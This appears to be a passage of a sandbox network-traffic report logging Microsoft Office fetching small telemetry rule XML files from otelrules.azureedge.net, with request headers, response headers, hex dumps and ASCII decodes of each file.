                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 792329fd-401e-0035-1f6c-3b82d8000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111016Z-178bfbc474bbcwv4hC1NYCypys00000001a0000000002y4g
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:16 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            41192.168.2.44977813.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:15 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:16 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: e83eb970-001e-0046-777e-3ada4b000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111016Z-1777c6cb754b7tdghC1TEBwwa40000000b7g0000000013zh
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:16 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            42192.168.2.44978013.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:15 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:16 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 171ae584-101e-005a-6763-3b882b000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111016Z-178bfbc474btrnf9hC1NYCb80g00000001e000000000f7a6
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:16 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            43192.168.2.44978213.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:17 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:18 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 1c81f4ad-001e-005a-6fbf-3bc3d0000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111018Z-1777c6cb754vxwc9hC1TEBykgw0000000b0g000000006k8p
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:18 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            44192.168.2.44978113.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:17 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:18 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 425
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 62f36519-501e-0016-468c-3a181b000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111018Z-1777c6cb754xjpthhC1TEBexs80000000av0000000009w6r
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:18 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            45192.168.2.44978313.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:17 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:18 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 448
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 2250be27-501e-007b-7961-3b5ba2000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111018Z-178bfbc474bwlrhlhC1NYCy3kg00000001ag00000000bct5
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:18 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            46192.168.2.44978413.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:18 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:18 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 491
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: e456cfdf-c01e-0014-248c-3aa6a3000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111018Z-r1d97b995777mdbwhC1TEBezag0000000a4000000000fta2
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:18 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            47192.168.2.44978513.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:18 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:18 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: c4abe473-d01e-008e-4d67-3b387a000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111018Z-178bfbc474brk967hC1NYCfu60000000015g000000007z84
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:18 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            48192.168.2.44979013.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:20 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:20 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: bdf96f18-c01e-0066-808c-3aa1ec000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111020Z-178bfbc474bbbqrhhC1NYCvw7400000001gg00000000933x
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:20 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            49192.168.2.44978713.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:20 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
